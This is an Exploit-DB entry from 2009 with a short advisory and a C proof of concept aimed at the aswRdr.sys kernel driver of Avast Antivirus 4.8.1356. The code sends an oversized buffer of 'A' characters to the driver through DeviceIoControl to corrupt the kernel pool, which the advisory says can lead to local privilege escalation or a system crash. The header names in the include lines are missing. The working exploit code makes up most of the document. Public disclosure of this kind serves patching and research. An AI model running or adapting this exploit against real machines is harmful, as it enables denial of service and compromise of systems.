Avast! AntiVirus 4.8.1356 - 'aswRdr.sys' Driver Privilege Escalation

EDB-ID:

33360


Author:

Evilcry

Type:

local


Platform:

Windows

Date:

2009-11-16


// source: https://www.securityfocus.com/bid/37031/info

Avast! Antivirus is prone to a local privilege-escalation vulnerability.

Local attackers can exploit this issue to execute arbitrary code with superuser privileges and completely compromise the affected computer. Failed exploit attempts will result in a denial-of-service condition.

Avast! Antivirus 4.8.1356 is vulnerable; other versions may also be affected.

/* Avast 4.8.1356.0 antivirus aswRdr.sys Kernel Pool Corruption
*
* Author(s): Giuseppe 'Evilcry' Bonfa'
*            AbdulAziz Hariri
* E-Mail: evilcry _AT_ gmail _DOT_ com
* Website: http://evilcry.netsons.org
*          http://evilcodecave.blogspot.com
*          http://evilcodecave.wordpress.com
*     http://evilfingers.com
*
*  Disclosure Timeline: As specified in the Advisory.
*/

#define WIN32_LEAN_AND_MEAN
#include
#include


BOOL OpenDevice(PWSTR DriverName, HANDLE *lphDevice) //taken from esagelab
{
 WCHAR DeviceName[MAX_PATH];
 HANDLE hDevice;

 if ((GetVersion() & 0xFF) >= 5)
 {
  wcscpy(DeviceName, L"\\\\.\\Global\\");
 }
 else
 {
  wcscpy(DeviceName, L"\\\\.\\");
 }

 wcscat(DeviceName, DriverName);

 printf("Opening.. %S\n", DeviceName);

 hDevice = CreateFileW(DeviceName, GENERIC_READ | GENERIC_WRITE, 0,
NULL, OPEN_EXISTING,
  FILE_ATTRIBUTE_NORMAL, NULL);

 if (hDevice == INVALID_HANDLE_VALUE)
 {
  printf("CreateFile() ERROR %d\n", GetLastError());
  return FALSE;
 }

 *lphDevice = hDevice;

 return TRUE;
}

int main()
{
 HANDLE hDev = NULL;
 DWORD Junk;

 if(!OpenDevice(L"aswRDR",&hDev))
 {
  printf("Unable to access aswMon");
  return(0);
 }

 char *Buff = (char *)VirtualAlloc(NULL, 0x156, MEM_RESERVE |
MEM_COMMIT, PAGE_EXECUTE_READWRITE);

 if (Buff)
 {
  memset(Buff, 'A', 0x156);

DeviceIoControl(hDev,0x80002024,Buff,0x156,Buff,0x156,&Junk,(LPOVERLAPPED)NULL);
  printf("DeviceIoControl Executed..\n");
 }
 else
 {
  printf("VirtualAlloc() ERROR %d\n", GetLastError());
 }


 return(0);
}